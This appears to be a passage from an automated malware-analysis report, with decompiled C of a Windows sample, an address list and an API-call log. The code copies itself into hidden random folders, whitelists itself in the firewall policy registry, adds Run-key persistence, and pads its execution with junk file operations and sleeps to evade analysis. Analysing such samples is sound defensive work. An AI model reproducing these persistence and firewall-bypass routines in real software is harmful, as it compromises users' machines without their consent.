											ShowWindow(_v4396, 0);
											SetForegroundWindow(_v4396);
											DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
											Sleep(0xfa0);
											_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
											if(_v4376 != 0) {
												_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
												if(_v4364 != 0) {
													Sleep(0x1388);
													MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
													Sleep(0x1388);
													DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
												}
												InternetCloseHandle(_v4364);
												Sleep(0x1388);
												DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
												Sleep(0x3e8);
											}
											InternetCloseHandle(_v4376);
										}
									}
									_v4372 = 0x12fd1;
									_v4356 = 0x3e7;
									while(_v4372 > _v4356) {
										_v4400 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
										if(_v4400 != 0) {
											DeleteFileA("3r38r38r838r838r388r838r83");
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											Sleep(0x1388);
											DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
											Sleep(0x1388);
											_v4356 = _v4356 + 1;
										}
									}
									if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
										DeleteFileA("3r38r38r838r838r388r838r83");
										Sleep(0x1388);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x1f4);
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
									}
									_v4360 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
									if(_v4360 != 0) {
										Sleep(0x1388);
										DeleteFileA("3r38r38r838r838r388r838r83");
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										SetForegroundWindow(_v4352);
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										ShowWindow(_v4352, 1);
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										Sleep(0xc8);
										CloseWindow(_v4352);
										Sleep(0x1f4);
									}
									_v4404 = 0;
									while(_v4404 < 0x190) {
										Sleep(0x1388);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileA("3r38r38r838r838r388r838r83");
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4404 = _v4404 + 1;
									}
									goto L172;
								}
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0x1770);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
								Sleep(0x7d0);
								if(_v4364 == 0) {
									L147:
									InternetCloseHandle(_v4364);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									goto L148;
								}
								_v4392 = 0;
								while(_v4392 < 0x190) {
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x7d0);
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									Sleep(0xfa0);
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4392 = _v4392 + 1;
								}
								goto L147;
							}
							Sleep(0x1f4); // executed
							memset( &_v1052, 0, 0x208);
							ExpandEnvironmentStringsW( *(_t1394 + _v4348 * 4 - 0x1044),  &_v1052, 0x208);
							_t714 = rand();
							asm("cdq");
							_t716 = rand();
							asm("cdq");
							_t718 = rand();
							asm("cdq");
							wsprintfW( &_v3132, L"%ls\\%d%d%d",  &_v1052, _t718 % 0x7530 + 0x3e8, _t716 % 0x7530 + 0x3e8, _t714 % 0x7530 + 0x3e8);
							wsprintfW( &_v3948, L"%ls\\%ls",  &_v3132,  &_v2608);
							_t1408 = _t1408 + 0x34;
							_t724 = CreateDirectoryW( &_v3132, 0); // executed
							if(_t724 == 0) {
								L194:
								_v4348 = _v4348 + 1;
								continue;
							}
							Sleep(0x3e8); // executed
							_t726 = CopyFileW( &_v1884,  &_v3948, 0); // executed
							if(_t726 == 0) {
								goto L194;
							}
							Sleep(0x3e8); // executed
							wsprintfW( &_v2508, L"%ls:*:Enabled:%ls",  &_v3948,  &_v1284);
							_t1431 = _t1408 + 0x10;
							SetFileAttributesW( &_v3132, 7); // executed
							SetFileAttributesW( &_v3948, 7); // executed
							_t732 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0xf003f,  &_v1888); // executed
							if(_t732 == 0) {
								_t747 = wcslen( &_v2508);
								_t1431 = _t1431 + 4;
								_t437 = _t747 + 2; // 0x2
								RegSetValueExW(_v1888,  &_v3948, 0, 1,  &_v2508, _t747 + _t437);
								RegCloseKey(_v1888);
							}
							_t733 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f,  &_v1888); // executed
							if(_t733 == 0) {
								_t742 = wcslen( &_v3948);
								_t1431 = _t1431 + 4;
								RegSetValueExW(_v1888,  &_v1284, 0, 1,  &_v3948, _t742 + _t742 + 2); // executed
								RegCloseKey(_v1888);
							}
							_t734 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f,  &_v1888); // executed
							if(_t734 == 0) {
								_t738 = wcslen( &_v3948);
								_t1431 = _t1431 + 4;
								_t453 = _t738 + 2; // 0x2
								RegSetValueExW(_v1888,  &_v1284, 0, 1,  &_v3948, _t738 + _t453); // executed
								RegCloseKey(_v1888);
							}
							_t736 = E008B2730( &_v3948); // executed
							_t1408 = _t1431 + 4;
							if((_t736 & 0x000000ff) != 1) {
								goto L194;
							}
							ExitProcess(0); // executed
						}
						goto L195;
					}
					ExitProcess(0);
				}
			}

0x008b2ab8
0x008b2ac4
0x008b2aca
0x008b2ad4
0x008b2ade
0x008b2af7
0x008b2afd
0x008b2b0a
0x008b32b9
0x008b32be
0x008b32c6
0x008b33ee
0x008b33f7
0x00000000
0x008b33f7
0x008b32cc
0x008b32e7
0x008b32fd
0x008b32e1
0x008b32e1
0x008b330a
0x008b331d
0x008b332a
0x008b3331
0x008b333e
0x008b334e
0x008b3360
0x008b336b
0x008b3378
0x008b3383
0x008b338e
0x008b3399
0x008b3399
0x008b339f
0x008b33ba
0x008b33cb
0x008b33d6
0x008b33e6
0x008b33b4
0x008b33b4
0x00000000
0x008b33ba
0x008b2b15
0x008b2b25
0x008b2b30
0x008b2b3b
0x008b2b46
0x008b2b56
0x008b2b5c
0x008b2b77
0x008b2b91
0x008b2b9c
0x008b2bac
0x008b2bb7
0x008b2bc2
0x008b2bcd
0x008b2bd8
0x008b2be8
0x008b2bf3
0x008b2bfe
0x008b2b71
0x008b2b71
0x008b2c0e
0x008b2c19
0x008b2c24
0x008b2c2f
0x008b2c3f
0x008b2c4a
0x008b2c55
0x008b2c6e
0x008b2c79
0x008b2c86
0x008b2d94
0x008b2d99
0x008b2da4
0x008b2db1
0x008b2dbc
0x008b2dcc
0x008b2dd7
0x008b2de6
0x008b2df3
0x008b2dfe
0x008b2e0b
0x008b2e1b
0x008b2e21
0x008b2e2b
0x008b2e41
0x008b2e51
0x008b2e5c
0x008b2e6c
0x008b2e77
0x008b2e82
0x008b2e8d
0x008b2ea0
0x008b2eb9
0x008b2ec6
0x008b2ed1
0x008b2ee1
0x008b2eec
0x008b2f0c
0x008b2f19
0x008b2f20
0x008b2f2b
0x008b2f36
0x008b2f46
0x008b2f56
0x008b2f61
0x008b2f6c
0x008b2f6c
0x008b2f79
0x008b2f84
0x008b2f84
0x008b2f91
0x008b2f9c
0x008b2fa9
0x008b2fb8
0x008b2fc3
0x008b2fd0
0x008b2fdb
0x008b2ff4
0x008b3001
0x008b3021
0x008b302e
0x008b3035
0x008b3040
0x008b3050
0x008b305b
0x008b3066
0x008b3066
0x008b3073
0x008b307e
0x008b3086
0x008b3096
0x008b30a1
0x008b30ac
0x008b30b7
0x008b30b7
0x008b30c4
0x008b30c4
0x008b2fa9
0x008b30ca
0x008b30d4
0x008b30de
0x008b30f9
0x008b3106
0x008b310d
0x008b3118
0x008b3128
0x008b3133
0x008b313e
0x008b3149
0x008b3158
0x008b3158
0x008b315e
0x008b3170
0x008b3177
0x008b3182
0x008b318d
0x008b3198
0x008b31a8
0x008b31a8
0x008b31bb
0x008b31c8
0x008b31d3
0x008b31de
0x008b31eb
0x008b31fb
0x008b320a
0x008b3215
0x008b3224
0x008b322f
0x008b323f
0x008b324a
0x008b3259
0x008b3264
0x008b326f
0x008b326f
0x008b3275
0x008b3290
0x008b32a1
0x008b32b1
0x008b328a
0x008b328a
0x00000000
0x008b3290
0x008b2c91
0x008b2ca1
0x008b2cb1
0x008b2cbc
0x008b2cc7
0x008b2cd2
0x008b2cdd
0x008b2cfd
0x008b2d08
0x008b2d15
0x008b2d7c
0x008b2d83
0x008b2d8e
0x00000000
0x008b2d8e
0x008b2d17
0x008b2d32
0x008b2d43
0x008b2d4e
0x008b2d5e
0x008b2d69
0x008b2d74
0x008b2d2c
0x008b2d2c
0x00000000
0x008b2d32
0x008b3407
0x008b340d
0x008b3418
0x008b3429
0x008b342f
0x008b342f
0x008b3435
0x008b343b
0x008b3440
0x008b3446
0x008b344c
0x008b3452
0x008b3458
0x008b345e
0x008b3463
0x008b3469
0x008b346f
0x008b3475
0x008b347b
0x008b3481
0x008b3486
0x008b348c
0x008b3492
0x008b34a8
0x008b34aa
0x008b34b4
0x008b34be
0x008b34c8
0x008b34d2
0x008b34dc
0x008b34e6
0x008b34f0
0x008b34fa
0x008b3504
0x008b350e
0x008b3518
0x008b3522
0x008b352c
0x008b3536
0x008b3540
0x008b354a
0x008b3554
0x008b355a
0x008b3560
0x008b3565
0x008b356b
0x008b3571
0x008b3577
0x008b357d
0x008b3583
0x008b3589
0x008b3590
0x008b3596
0x008b35ac
0x008b35be
0x008b35c0
0x008b35d2
0x008b35d4
0x008b35e6
0x008b35e8
0x008b35f9
0x008b35fb
0x008b35fd
0x008b3603
0x008b3609
0x008b360e
0x008b3614
0x008b361a
0x008b3620
0x008b3626
0x008b362c
0x008b3631
0x008b3637
0x008b363d
0x008b3643
0x008b3649
0x008b364f
0x008b3654
0x008b365a
0x008b3660
0x008b3666
0x008b366d
0x008b3684
0x008b3686
0x008b3688
0x008b3689
0x008b368e
0x008b3694
0x008b369a
0x008b36a0
0x008b36a6
0x008b36ac
0x008b36b1
0x008b36b7
0x008b36bd
0x008b36c3
0x008b36c9
0x008b36cf
0x008b36d4
0x008b36da
0x008b36e0
0x008b36e6
0x008b36ec
0x008b36f2
0x008b36f7
0x008b36fd
0x008b3704
0x008b370b
0x008b3711
0x008b3717
0x008b371c
0x008b3722
0x008b3728
0x008b372e
0x008b3734
0x008b373a
0x008b373f
0x008b3745
0x008b374b
0x008b3751
0x008b3757
0x008b375d
0x008b3762
0x008b3768
0x008b376e
0x008b3774
0x008b377a
0x008b3780
0x008b3786
0x008b379d
0x008b37af
0x008b37b1
0x008b37b7
0x008b37bd
0x008b37c3
0x008b37c9
0x008b37cf
0x008b37d6
0x008b37dc
0x008b37f2
0x008b37f2
0x008b37ff
0x008b3805
0x008b3816
0x008b3820
0x008b382a
0x008b3834
0x008b3840
0x008b3846
0x008b384c
0x008b3852
0x008b3858
0x008b385e
0x008b3864
0x008b386a
0x008b3870
0x008b3876
0x008b3880
0x008b388a
0x008b38a1
0x008b38a9
0x008b39bb
0x008b39c2
0x008b39c8
0x008b39d5
0x008b3e6e
0x008b3e77
0x00000000
0x008b3e77
0x008b39e5
0x008b39f0
0x008b39fb
0x008b3a0b
0x008b3a16
0x008b3a2f
0x008b3a3a
0x008b3a47
0x008b3a4e
0x008b3a6e
0x008b3a7b
0x008b3a82
0x008b3a8d
0x008b3a8d
0x008b3a9a
0x008b3aa5
0x008b3aa5
0x008b3ab2
0x008b3ac5
0x008b3ad1
0x008b3ae1
0x008b3ae1
0x008b3af4
0x008b3b01
0x008b3b0f
0x008b3b1f
0x008b3b2c
0x008b3b2c
0x008b3b37
0x008b3b47
0x008b3b56
0x008b3b66
0x008b3b73
0x008b3b7e
0x008b3b8b
0x008b3b91
0x008b3b9b
0x008b3bb1
0x008b3bc1
0x008b3bd1
0x008b3be4
0x008b3bfd
0x008b3c0a
0x008b3c11
0x008b3c31
0x008b3c3e
0x008b3c45
0x008b3c55
0x008b3c60
0x008b3c70
0x008b3c70
0x008b3c7d
0x008b3c85
0x008b3c85
0x008b3c92
0x008b3c9d
0x008b3caa
0x008b3cb7
0x008b3cc2
0x008b3cd2
0x008b3ce1
0x008b3cec
0x008b3cf7
0x008b3d10
0x008b3d1d
0x008b3d39
0x008b3d46
0x008b3d52
0x008b3d52
0x008b3d5f
0x008b3d67
0x008b3d77
0x008b3d82
0x008b3d8d
0x008b3d8d
0x008b3d9a
0x008b3d9a
0x008b3caa
0x008b3da0
0x008b3daa
0x008b3db4
0x008b3dcf
0x008b3ddc
0x008b3de8
0x008b3df3
0x008b3e02
0x008b3e02
0x008b3e08
0x008b3e0a
0x008b3e25
0x008b3e3b
0x008b3e4b
0x008b3e56
0x008b3e66
0x008b3e1f
0x008b3e1f
0x00000000
0x008b3e25
0x008b38b9
0x008b38bf
0x008b38da
0x008b38f0
0x008b38fb
0x008b38d4
0x008b38d4
0x008b3908
0x008b391b
0x008b3928
0x008b3934
0x008b3946
0x008b3956
0x008b3961
0x008b396c
0x008b396c
0x008b3972
0x008b398d
0x008b39a3
0x008b39b3
0x008b3987
0x008b3987
0x00000000
0x008b398d
0x008b3e87
0x008b3e9b
0x008b3ea6
0x008b3eac
0x008b3eb5
0x008b3ec8
0x008b3ee1
0x008b3ef1
0x008b3efe
0x008b3f08
0x008b3f1a
0x008b3f1f
0x008b3f24
0x008b4f44
0x008b4f49
0x008b4f64
0x008b4f69
0x008b4f7a
0x008b50e3
0x008b50e8
0x008b5103
0x008b5108
0x008b5119
0x008b5126
0x008b5135
0x008b5144
0x008b5153
0x008b5162
0x008b5171
0x008b5180
0x008b5185
0x008b51a3
0x008b51c4
0x008b51e5
0x008b5206
0x008b5227
0x008b5248
0x008b5269
0x008b5276
0x008b5276
0x008b5281
0x008b529c
0x008b52a1
0x008b52b2
0x008b52bf
0x008b52ce
0x008b52dd
0x008b52ec
0x008b52fb
0x008b530a
0x008b5319
0x008b531e
0x008b533c
0x008b535d
0x008b537e
0x008b539f
0x008b53c0
0x008b53e1
0x008b5402
0x008b540f
0x008b540f
0x008b541a
0x008b542f
0x008b543a
0x008b544f
0x008b545a
0x008b5460
0x008b5462
0x008b5468
0x008b5483
0x008b5492
0x008b5498
0x008b54b3
0x008b54be
0x008b54ec
0x008b550a
0x008b550f
0x008b5518
0x008b5521
0x008b5526
0x008b5526
0x008b54ad
0x008b54ad
0x008b547d
0x008b547d
0x008b5533
0x008b5538
0x008b554a
0x008b554a
0x008b5460
0x008b4fa4
0x008b4fbf
0x008b4fc4
0x008b4fd5
0x008b4ff4
0x008b4ff9
0x008b5002
0x008b5002
0x008b501d
0x008b5022
0x008b5033
0x008b5040
0x008b504f
0x008b505e
0x008b5063
0x008b5081
0x008b50a2
0x008b50c3
0x008b50d0
0x008b50d0
0x008b50dd
0x00000000
0x008b50dd
0x008b3f2f
0x008b3f35
0x008b3f3f
0x008b3f49
0x008b3f62
0x008b3f68
0x008b3f75
0x008b440c
0x008b4415
0x00000000
0x008b4415
0x008b3f80
0x008b3f8b
0x008b3f96
0x008b3fa9
0x008b3fb0
0x008b3fc0
0x008b3fcb
0x008b3fcb
0x008b3fde
0x008b3feb
0x008b3ff7
0x008b4006
0x008b4015
0x008b4020
0x008b4030
0x008b403f
0x008b4051
0x008b405e
0x008b405e
0x008b4077
0x008b4084
0x008b40a0
0x008b40ad
0x008b40b4
0x008b40bf
0x008b40ca
0x008b40ca
0x008b40d7
0x008b40e2
0x008b40e2
0x008b40ef
0x008b40fa
0x008b4109
0x008b4119
0x008b4128
0x008b4133
0x008b4140
0x008b414b
0x008b4158
0x008b4165
0x008b416b
0x008b4175
0x008b418b
0x008b419b
0x008b41a6
0x008b41b9
0x008b41c9
0x008b41e2
0x008b41ef
0x008b420b
0x008b4218
0x008b421f
0x008b422a
0x008b4235
0x008b4235
0x008b4242
0x008b424a
0x008b424a
0x008b4257
0x008b4262
0x008b426f
0x008b427a
0x008b4287
0x008b4297
0x008b42a6
0x008b42b1
0x008b42bc
0x008b42d5
0x008b42e2
0x008b42fe
0x008b430b
0x008b4312
0x008b431d
0x008b432d
0x008b4338
0x008b4338
0x008b4345
0x008b4350
0x008b4350
0x008b435d
0x008b4368
0x008b4368
0x008b426f
0x008b436e
0x008b4378
0x008b4382
0x008b439d
0x008b43aa
0x008b43b1
0x008b43c0
0x008b43c0
0x008b43c6
0x008b43c8
0x008b43e3
0x008b43f4
0x008b4404
0x008b43dd
0x008b43dd
0x00000000
0x008b43e3
0x008b4425
0x008b442b
0x008b4446
0x008b4458
0x008b445e
0x008b4468
0x008b4472
0x008b448b
0x008b4491
0x008b449e
0x008b4b6e
0x008b4b73
0x008b4b7b
0x008b4c9e
0x008b4ca7
0x00000000
0x008b4ca7
0x008b4b86
0x008b4b8c
0x008b4ba7
0x008b4bbd
0x008b4bc8
0x008b4ba1
0x008b4ba1
0x008b4bd5
0x008b4be8
0x008b4bf5
0x008b4bfc
0x008b4c09
0x008b4c16
0x008b4c21
0x008b4c31
0x008b4c3c
0x008b4c49
0x008b4c54
0x008b4c54
0x008b4c5a
0x008b4c75
0x008b4c86
0x008b4c96
0x008b4c6f
0x008b4c6f
0x00000000
0x008b4c75
0x008b44a9
0x008b44b4
0x008b44bf
0x008b44ca
0x008b44d5
0x008b44e5
0x008b44eb
0x008b4506
0x008b4517
0x008b4527
0x008b4537
0x008b4542
0x008b454d
0x008b4500
0x008b4500
0x008b455a
0x008b4565
0x008b4570
0x008b4580
0x008b458b
0x008b4596
0x008b45af
0x008b45ba
0x008b45c7
0x008b46ba
0x008b46bf
0x008b46ca
0x008b46d7
0x008b46e2
0x008b46ef
0x008b46fc
0x008b470c
0x008b4719
0x008b4729
0x008b472f
0x008b4739
0x008b474f
0x008b475f
0x008b476f
0x008b477a
0x008b478a
0x008b479d
0x008b47b6
0x008b47c3
0x008b47ce
0x008b47de
0x008b47fe
0x008b480b
0x008b4812
0x008b481d
0x008b482d
0x008b4838
0x008b4843
0x008b4843
0x008b4850
0x008b485b
0x008b485b
0x008b4868
0x008b4873
0x008b4880
0x008b4890
0x008b489f
0x008b48ac
0x008b48b7
0x008b48c2
0x008b48db
0x008b48e8
0x008b4908
0x008b4915
0x008b491c
0x008b492c
0x008b4937
0x008b4942
0x008b4942
0x008b494f
0x008b495a
0x008b4965
0x008b4970
0x008b4970
0x008b497d
0x008b497d
0x008b4880
0x008b4983
0x008b498d
0x008b4997
0x008b49b2
0x008b49bf
0x008b49c6
0x008b49d6
0x008b49e1
0x008b49ec
0x008b49f7
0x008b4a06
0x008b4a06
0x008b4a0c
0x008b4a1b
0x008b4a22
0x008b4a2d
0x008b4a38
0x008b4a43
0x008b4a53
0x008b4a53
0x008b4a66
0x008b4a73
0x008b4a7e
0x008b4a89
0x008b4a94
0x008b4aa1
0x008b4ab1
0x008b4ac0
0x008b4ad0
0x008b4ae0
0x008b4aeb
0x008b4af8
0x008b4b03
0x008b4b03
0x008b4b09
0x008b4b24
0x008b4b35
0x008b4b40
0x008b4b4b
0x008b4b5b
0x008b4b66
0x008b4b1e
0x008b4b1e
0x00000000
0x008b4b24
0x008b45d7
0x008b45e2
0x008b45ed
0x008b45f8
0x008b4603
0x008b4623
0x008b462e
0x008b463b
0x008b46a2
0x008b46a9
0x008b46b4
0x00000000
0x008b46b4
0x008b463d
0x008b4658
0x008b4669
0x008b4674
0x008b4684
0x008b468f
0x008b469a
0x008b4652
0x008b4652
0x00000000
0x008b4658
0x008b4cb7
0x008b4ccb
0x008b4ced
0x008b4cf3
0x008b4cf8
0x008b4d07
0x008b4d0c
0x008b4d1b
0x008b4d20
0x008b4d42
0x008b4d65
0x008b4d6b
0x008b4d77
0x008b4d7f
0x008b4f3f
0x008b4440
0x00000000
0x008b4440
0x008b4d8a
0x008b4da0
0x008b4da8
0x00000000
0x00000000
0x008b4db3
0x008b4dd3
0x008b4dd9
0x008b4de5
0x008b4df4
0x008b4e12
0x008b4e1a
0x008b4e23
0x008b4e28
0x008b4e2b
0x008b4e49
0x008b4e56
0x008b4e56
0x008b4e74
0x008b4e7c
0x008b4e85
0x008b4e8a
0x008b4eab
0x008b4eb8
0x008b4eb8
0x008b4ed6
0x008b4ede
0x008b4ee7
0x008b4eec
0x008b4eef
0x008b4f0d
0x008b4f1a
0x008b4f1a
0x008b4f27
0x008b4f2c
0x008b4f35
0x00000000
0x00000000
0x008b4f39
0x008b4f39
0x00000000
0x008b4446
0x008b381a
0x008b381a

APIs

Sleep.KERNELBASE(000007D0,?,?,?,008B574E,00000000,?,0000000A), ref: 008B2AC4
FindWindowA.USER32 ref: 008B2AF7
Sleep.KERNEL32(00000FA0), ref: 008B2B15
MoveFileA.KERNEL32 ref: 008B2B25
Sleep.KERNEL32(000003E8), ref: 008B2B30
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2B3B
Sleep.KERNEL32(00002328), ref: 008B2B46
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2B56
MoveFileA.KERNEL32 ref: 008B2B91
Sleep.KERNEL32(00000FA0), ref: 008B2B9C
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B2BAC
Sleep.KERNEL32(00000BB8), ref: 008B2BB7
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2BC2
Sleep.KERNEL32(000007D0), ref: 008B2BCD
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2BD8
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2BE8
Sleep.KERNEL32(00000FA0), ref: 008B2BF3
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B2BFE
Sleep.KERNEL32(000003E8), ref: 008B2C0E
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B2C19
Sleep.KERNEL32(00001770), ref: 008B2C24
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2C2F
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2C3F
Sleep.KERNEL32(00001388), ref: 008B2C4A
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2C55
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B2C68
DeleteFileW.KERNEL32(3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B2C79
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2C91
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2CA1
MoveFileA.KERNEL32 ref: 008B2CB1
Sleep.KERNEL32(00001388), ref: 008B2CBC
DeleteFileW.KERNEL32(3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 008B2CC7
Sleep.KERNEL32(00000BB8), ref: 008B2CD2
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B2CDD
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 008B2CF7
Sleep.KERNEL32(000007D0), ref: 008B2D08
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2D43
Sleep.KERNEL32(000007D0), ref: 008B2D4E
MoveFileA.KERNEL32 ref: 008B2D5E
Sleep.KERNEL32(00000FA0), ref: 008B2D69
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B2D74
InternetCloseHandle.WININET(00000000), ref: 008B2D83
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B2D8E
Sleep.KERNEL32(00001B58), ref: 008B2D99
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B2DA4
InternetCloseHandle.WININET(00000000), ref: 008B2DB1
Sleep.KERNEL32(00002710), ref: 008B2DBC
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2DCC
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2DD7
ShowWindow.USER32(00000000,00000001), ref: 008B2DE6
SetForegroundWindow.USER32(00000000), ref: 008B2DF3
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2DFE
CloseWindow.USER32 ref: 008B2E0B
MoveFileA.KERNEL32 ref: 008B2E1B
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2E5C
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2E6C
Sleep.KERNEL32(000007D0), ref: 008B2E77
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2E82
DeleteFileA.KERNEL32(4tt4t4wwt44t4tw4tw4wt4tw4t), ref: 008B2E8D
FindWindowA.USER32 ref: 008B2E9A
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B2EB3
Sleep.KERNEL32(00001F40), ref: 008B2ED1
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2EE1
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2EEC
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 008B2F06
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2F20
Sleep.KERNEL32(00001388), ref: 008B2F2B
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 008B2F36
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B2F46
MoveFileA.KERNEL32 ref: 008B2F56
Sleep.KERNEL32(00000FA0), ref: 008B2F61
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B2F6C
InternetCloseHandle.WININET(00000000), ref: 008B2F79
Sleep.KERNEL32(00000DAC), ref: 008B2F84
InternetCloseHandle.WININET(00000000), ref: 008B2F91
Sleep.KERNEL32(00001388), ref: 008B2F9C
ShowWindow.USER32(00000000,00000000), ref: 008B2FB8
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B2FC3
SetForegroundWindow.USER32(00000000), ref: 008B2FD0
Sleep.KERNEL32(00000DAC), ref: 008B2FDB
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B2FEE
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 008B301B
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B3035
Sleep.KERNEL32(00001388), ref: 008B3040
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 008B3050
Sleep.KERNEL32(00000BB8), ref: 008B305B
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 008B3066
InternetCloseHandle.WININET(00000000), ref: 008B3073
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B307E
Sleep.KERNEL32(00000064), ref: 008B3086
MoveFileA.KERNEL32 ref: 008B3096
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 008B30A1
